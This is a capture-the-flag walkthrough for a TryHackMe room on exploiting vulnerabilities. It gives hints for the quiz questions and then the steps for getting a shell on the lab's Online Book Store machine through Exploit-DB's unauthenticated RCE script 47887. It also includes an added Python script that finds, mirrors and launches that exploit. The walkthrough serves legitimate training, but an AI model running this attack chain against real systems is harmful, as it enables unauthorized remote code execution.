The Exploit Vulnerabilities/CMNatic Bookstore room is the second of three rooms by cmnatic (https://tryhackme.com/p/cmnatic) that teach software vulnerabilities. The first four tasks are theory questions; the last task involves manually exploiting a vulnerable machine.
The room is available at https://tryhackme.com/room/exploitingavulnerabilityv2
Question 1: Start the machine
Question 2: Would you use an automated scanner? (Yay/Nay)
Question 2 Answer: Hint – Which is faster
Question 3: What vulnerability is this?
Question 3 Answer: Hint – You would need to input harmful code.
Question 4: You manage to impersonate another user. What vulnerability is this?
Question 4 Answer: Hint – Look at the table of different vulnerabilities.
Question 5: What website would you use as a security researcher if you wanted to upload a Proof of Concept?
Question 5 Answer: Hint – Very popular code hosting site owned by Microsoft
Question 6: You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?
Question 6 Answer: Hint – offline tool installed on Kali Linux
Question 7: What type of vulnerability was used in this attack?
Question 7 Answer: Hint – the acronym is RCE
Question 8: Find out the version of the application that is running. What are the name and version number of the application?
Question 8 Answer: Hint – look at the bottom right-hand side of the page. Note the exact version: you want it to match the version named in the exploit you pick before you run anything against the box.
Question 9: Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory?
This is where the theory stops and the practical begins.
Run the following command:
searchsploit Online Book Store
Alternatively, search Exploit Database (https://www.exploit-db.com) for Online Book Store. Several results come up; the Unauthenticated Remote Code Execution exploit is the one to use, since it needs no credentials on the target.
Download or copy the Python file (47887.py) into your home directory, then run the following command:
python3 47887.py http://x.x.x.x/
Replace x.x.x.x with the IP address of the target machine, keeping the URL in the form shown.
When the script asks "Do you wish to launch a shell here?", answer y.
The exploit then drops you into a shell on the target (the original post shows a screenshot of it here, captioned RCE).
Change directory to /var/www/html/bootstrap/img, find flag.txt there and view it. Paste its contents into the last question and you are done.
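To tie the practical steps together, here is an added example script of my own; it is not part of cmnatic's room and it is not the Exploit-DB exploit itself. It runs searchsploit with --json, picks the Unauthenticated Remote Code Execution entry out of the several matches, mirrors that exploit into the current directory with searchsploit -m, and then hands the terminal over to the exploit so you can answer its shell prompt yourself. The --json key names it relies on (RESULTS_EXPLOIT, Title, EDB-ID, Path) and the sample searchsploit output embedded in it are assumptions; only EDB-ID 47887 and its title come from the write-up, the other two entries in the sample are constructed to exercise the selection logic.

```python
#!/usr/bin/env python3
"""Added example: searchsploit -> pick the unauthenticated RCE -> mirror -> run.

Not the room's or Exploit-DB's code. Assumes (not stated in the write-up) that
`searchsploit --json` prints a RESULTS_EXPLOIT list whose entries carry Title,
EDB-ID and Path keys, and that the mirrored exploit takes the target base URL
as its only argument, as the write-up's own command line shows.
"""
import json
import os
import subprocess
import sys
from typing import Optional

SEARCH_TERMS = "Online Book Store"
WANTED = "remote code execution"          # the write-up chooses the RCE entry
FLAG_DIR = "/var/www/html/bootstrap/img"   # where the write-up says flag.txt lives

# Constructed sample in the shape searchsploit --json is assumed to print.
# Only 47887 is real (it is the script the write-up runs); 00001/00002 are
# made up so the selection below has something to reject.
SAMPLE_SEARCH_OUTPUT = json.dumps({
    "SEARCH": SEARCH_TERMS,
    "RESULTS_EXPLOIT": [
        {"Title": "Online Book Store 1.0 - SQL Injection (constructed)",
         "EDB-ID": "00001", "Path": "/usr/share/exploitdb/exploits/php/webapps/00001.txt"},
        {"Title": "Online Book Store 1.0 - Authenticated Remote Code Execution (constructed)",
         "EDB-ID": "00002", "Path": "/usr/share/exploitdb/exploits/php/webapps/00002.py"},
        {"Title": "Online Book Store 1.0 - Unauthenticated Remote Code Execution",
         "EDB-ID": "47887", "Path": "/usr/share/exploitdb/exploits/php/webapps/47887.py"},
    ],
    "RESULTS_SHELLCODE": [],
})


def pick_rce_exploit(search_json: str) -> Optional[dict]:
    """Return the Exploit-DB entry to use, or None if no RCE entry matched.

    Titles are matched case-insensitively on "remote code execution"; an
    entry whose title says "unauthenticated" is preferred over one that does
    not, so an authenticated RCE never wins when an unauthenticated one exists.
    """
    results = json.loads(search_json).get("RESULTS_EXPLOIT", [])
    rce = [r for r in results if WANTED in r.get("Title", "").lower()]
    # False sorts before True: unauthenticated entries come first.
    rce.sort(key=lambda r: "unauthenticated" not in r["Title"].lower())
    return rce[0] if rce else None


def mirror(entry: dict, dest_dir: str) -> str:
    """Copy the exploit into dest_dir with `searchsploit -m <EDB-ID>` and return its path."""
    script = os.path.join(dest_dir, os.path.basename(entry["Path"]))
    if not os.path.exists(script):
        subprocess.run(["searchsploit", "-m", entry["EDB-ID"]], cwd=dest_dir, check=True)
    return script


def run_exploit(script: str, target: str) -> None:
    """Replace this process with the exploit so its 'launch a shell?' prompt reaches you."""
    os.execvp(sys.executable, [sys.executable, script, target])


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} http://x.x.x.x/")
    target = sys.argv[1].rstrip("/") + "/"   # same URL shape as the write-up's command
    search = subprocess.run(["searchsploit", "--json", *SEARCH_TERMS.split()],
                            capture_output=True, text=True, check=True).stdout
    entry = pick_rce_exploit(search)
    if entry is None:
        sys.exit("no RCE entry found; is the exploitdb package installed and updated?")
    print(f"[*] using {entry['Title']} (EDB-ID {entry['EDB-ID']})")
    print(f"[*] once you have the shell: cat {FLAG_DIR}/flag.txt")
    run_exploit(mirror(entry, os.getcwd()), target)
```

Run it as `python3 bookstore_rce.py http://x.x.x.x/` on a Kali box with the exploitdb package present; everything after the searchsploit lookup is the exploit's own interactive session, so you still answer y at its prompt and read the flag by hand.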